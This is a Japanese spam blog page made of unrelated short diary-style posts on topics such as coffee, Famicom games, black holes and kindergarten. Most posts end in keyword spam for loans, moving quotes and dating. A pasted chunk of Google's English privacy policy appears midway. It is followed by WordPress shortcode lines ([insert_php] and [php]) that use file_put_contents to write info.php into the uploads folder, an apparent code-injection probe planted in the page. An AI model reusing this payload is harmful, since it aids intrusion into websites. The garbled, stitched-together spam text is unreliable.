昔のお笑いにこういうものがありました

聞いた話、キリスト教には懺悔というものがあり、これをすることで、罪を悔い改めるというのを、本当にやるようですね。
はからずしも、田代まさしのお笑い、ちょうど80年後期のものを思い出しました。

なんか、懺悔っぽくやっていて、上からたらいと水が落ちてくるという、当時のお笑いだったのですが、あの番組名覚えてないですね。
あの時、すでに田代まさしは、覚せい剤をやっていたのでしょうか。
ともあれ、あれなんて番組でしたっけ。

自分がまだ、年齢も6歳くらいの頃の番組だったので、ろくに覚えていませんが、もう30年も前です。
今の若い人は、今のお笑いを見て、自分くらいの年齢になって、あんなのがあったねーという風になるのでしょうね。
なんだか、年齢というのと、その流れなどは面白いと思っています。

おれたちひょうきん族だったかなあと思っているのですが、知っている人は、余りにも古いのでわからないでしょうね。
まあ、そんな自分もお笑いは見ていないですが。http://xn--1tw704d8nf48d.jpn.org/

最終的にノンカフェインコーヒーに落ち着くか

朝に飲むコーヒーは私にとって1日のスタートを切る上でも最高の楽しみなのですが、ここのところは嗜好が次第にホットからアイスへと変わり、暑い夏シーズンがスタートした事を実感します。

自宅でゆっくり時間が取れるケースでは大抵どんなコーヒーでも1杯はおかわりするもので、最初の1杯だけでは何か物足りなさを感じてしまうもの。ただ最近飲んでいるパックのアイスコーヒーはパンチの効いた濃い目の味付けとなっている為、1杯でも十分に満足出来ているのです。

コーヒーの飲み過ぎによるカフェイン過多は近頃話題に上る事も多く、私も最近になって注意し出しています。ただ1日トータル2、3杯飲んだ程度では特別深刻な症状が出る事も無く、利尿作用が強くなりトイレが近くなって初めて、これならちょっと控えるべきだったかな?と少し反省する程度。

店頭にノンカフェインタイプのコーヒーが並んでいるのを見掛け興味が湧いてきたのも最近で、今度はこれらを積極的に試してみようかとも考えています。30日間無利息

ファミコンからVRまでを考えてみる

私は、小学生の頃、ゲームにハマっていました。
ちょうど、小学校低学年の時に、ファミリーコンピューターが発売されて、
親におねだりをして、買ってもらいました。
今でも値札の値段を覚えているくらい、衝撃的でした。
その値段は14800円だったと思います。

ドラゴンクエストなんかを楽しみ、ドラクエ3で、
私のゲームへの情熱が開花したと感じました。
でも、実際は、ソフトを買うにはお金がかかるし、
友達からソフトを借りるときは、自分のソフトで面白いものと、交換と言う形で、
遊んでいましたので、お金があまりない私には、
すぐに限界がやってきてしまいました。

スーパーファミコンも買ったのですが、ストリートファイター2を遊んだくらいで、
あまりハマりませんでした。
そして、今、最先端のゲーム機と言えば、VRと呼ばれる、バーチャルリアリティのゲームですよね。
あれは、一度やってみたいなあと思っています。

なんていうか、子供の脳の発達と、ゲーム機の高性能化とが、うまくリンクしてれば問題ないですが、
ゲーム業界だけ進化している気がして、それが、子供や大人のゲーマーに対して、
いいことなのかどうか、ちょっと考えてしまいます。一括査定

信用の出来ない知り合いママさん

ママ友トラブルというのがあるとは良く聞きます。
でも、実際にそこまでのトラブルになった事がある人は少ないと思います。
私は、相手がママ友なのかも怪しいけど最近、ちょっと気になった出来事がありました。

息子と同じ年齢の子供を持つ、同じマンションに住むママさん。
とても愛想が良くて、あちこちで知り合いを増やしているようでマンションではいつも見かける度に井戸端会議してるイメージです。
わたしも前に声をかけられ、メールアドレス交換してたまに話したり遊んだりしてました。
でも、子供の幼稚園も違うし同じ幼稚園の親子がたくさんマンションにいるらしくて疎遠になってました。

しかし、最近ゴミ捨ての時に久々に声をかけられました。
来年度お互い、子供は同じ小学校に上がるのです。
私は、近々ある学校公開や運動会の新入学児童競技は私と子で行くつもりでした。

別に知り合いいないし、と言うと私もだよ、女の子のママが多いから約束してまで一緒に行く人いないし、良かったら一緒に行こうと言われました。
特に断る理由もなかったのでそうだね、と言ったのですが、嫌な予感がしました。
その人はそんなこと言うけど、マンションだけでも仲の良い人はたくさんいて結局口先だけな時が多いからです。
それで、その後は連絡をこちらからしませんでした。
そして、やはりそういうイベントは結局他の親子と一緒に仲良く出掛けるのを見かけました。
やっぱり、上辺だけなんだな、と感じてもう信用しない事にしました。引越し 見積もり

雑談をしながら、愚痴は終わりを迎える所です

筆ペンで描ける水墨画というのは、バカにすると、水墨画が描けなくなると思っていますけど。

これは、やり方によっては、本当に活きるものです。
以前、水で書ける書道というものを、動画で紹介していましたが、こういうものも活きるのではないのでしょうかね。

血糖値が収まって、怒りも少なくなってきました。
なんだか、どうでもいいやという感じです。
どうでもいいので、サンクスの無糖コーヒー飲みたいって、かなり前から言っていますね。
ここも田舎とはいえ、東京なんで、やっぱり夜遅くにアウトローが出始めるのでささっと行って来ないといけません。

そうそう、息子がバカだってのは今日に始まったことではないのです。
今更ではないですか。自分が東大なり、医者か弁護士にでもならない限り、生涯、障害というわけです。
ストレスを溜めないためにも、仲良くやっていこうと思いました。

ジョン万次郎って、本当に立派だと思いますね。有名大学より、遥かに凄いと思います。

引越し 見積もり

ブラックホールの形成と衝突

宇宙に数多くある惑星や恒星が球の形になっているのは、それらの星に対する重力と圧力がつり合っているためです。しかし、星は誕生してから時間をかけて、質量を増やしていくと言われています。星が重たくなってくると圧力が大きくなってもそれ以上に重力が強くなります。星は、非常に強い重力のため力のつり合いがとれず、重力崩壊を起こして収縮してしまいます。

 そして、最後には密度や重力の強さが無限というほど重力が一点に集中します。こうした重力崩壊では、強い重力によって空間はゆがみ、時間の進み方は遅くなっていきます。また、星の表面から光の波長が出て、それは引き伸ばされて赤い色に変わっていきます。やがて光の波長は観測不可能な黒い色に変わっていきます。さらに星が収縮すると、その周辺にブラックホールが形成されるのです。

 また、ブラックホール同士が衝突すると、お互いを吸収し合って一つのブラックホールに合体します。そして、ブラックホールの質量が2倍になるとその表面積は約4倍にもなるということです。また、ブラックホールが合体するときには強い重力波が放出されると考えられていますが、光速度で宇宙空間に伝わっていくため、その検出は困難であるとされています。
DMMスマホ

幼稚園生活で成長を感じる子供

幼稚園に入る前は、歩けるけどあまり歩かずにすぐに抱っこを要求していた我が家の長男。
外遊びもそれほどせず、室内のおもちゃ遊びが多かったし、疲れやすくて3歳過ぎても昼寝も多い子供でした。
でも、幼稚園に入って早いものでもう年少、年中と通い、今では帰宅してからも元気が有り余っている男の子になりました。

甘えて抱きついてきたりはありますが、抱っこで歩かされたりはもうありません。
ちゃんと疲れても長い距離を自分の足で歩くし、昼寝は全くしなくなるほど体力がつきました。
年少さんで慣れたクラスからまた年中さんになる時にクラス替えもあったけど、彼なりに順応して頑張ってきました。

嫌な事もあるはずだけど、身体の具合が悪い時以外はちゃんと幼稚園に行って頑張ってきました。
親は幼稚園に入る前の、人見知りで甘えん坊で弱いという印象の強かった長男を何かと心配してしまうのですが、本人はどんどん成長してるんですね。
わたしはあまり過剰な心配をせずに、あと一年間幼稚園で頑張ってもらいたいと思います。
そしたらきっと、小学生になるのが待ち遠しい素敵なお兄ちゃんになってると期待しています。

出会い

平和かつ幸せだなと外に出て、なんととなく思いました

うーんと思ったのは、親孝行の話で、今は日本学生支援機構なんて、良いものもあるので、噂の音大に行ってみようかなあと思いました。
やっぱり演奏というのは楽しいものです。
ロックのように、わいわいと若い人がやるより、渋いものが、性格的に合っていると思いますね。
輪に入るより、独奏タイプですからね。

という感じで、三味線を頑張って買おうと思いました。
勿論、それ以外の事もやりますよ。折り紙だって大事です。

やっぱり外に出ると、気分が良くなるなあと思いました。

家の中にいると、考えすぎてしまう所もあるので、思いきって散歩してみるのも良いのかもしれませんね。
アラフォー未婚の女性もいるでしょうし、同じようなオタク入った男もいるでしょうから、やっぱり、人との出逢いが一番、楽しいと思っています。

元々、社会貢献を凄く考えていて、それに加えて、楽器講師も考えているという計画を、外してはならないと思っていますしね。
楽しい人生を送れる事が、何よりも幸せだと思っています。
ゲーム業界 転職

野球賭博の問題を考えながら疲れた人が多いように思えます

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

ただ、なんとなくというCMを見ていてそれでいいのではと思いますけどね

何かのCMにあった、ただなんとなく高校行ってなんとなく大学に行って、なんとなく彼女をつくって、なんとなく就職して、なんてやっていましたが、そうでしょうね、そのなんとなくな人生でも生きていると楽しいとは思いますよ。

それが出来ない人も世の中には沢山いますし、歳を取ると平凡な人生の方が楽しいと思うこともあります。

そういえば、知人と都内へ出かけた時、〇〇(自分)君は留年した学生みたいだよーなんて揶揄されて、取り合えず気合いを入れて一緒に加わったというのがありました。

あれはあれで、他人はなんとでもいうという事だろうなあと思っています。

世の中の人は結局馬鹿にして笑っているだけですから、そういう事もあるでしょうね。

なんとなくという日々がなくなってくる場合も人生はありますよ。

なんとなく、平和でない日々もありますし、ただやっぱり今の若者にはやり甲斐をという目標を掲げた映画やテレビも受けてはいるようですけど、大体は普通な人生に喜びを見出だすのではないでしょうか。

ヒロイズムなんておじさんにもないですし。そういえば知人は平和に暮らしているのかなあと思っています。

元気であればいいですが。
出会い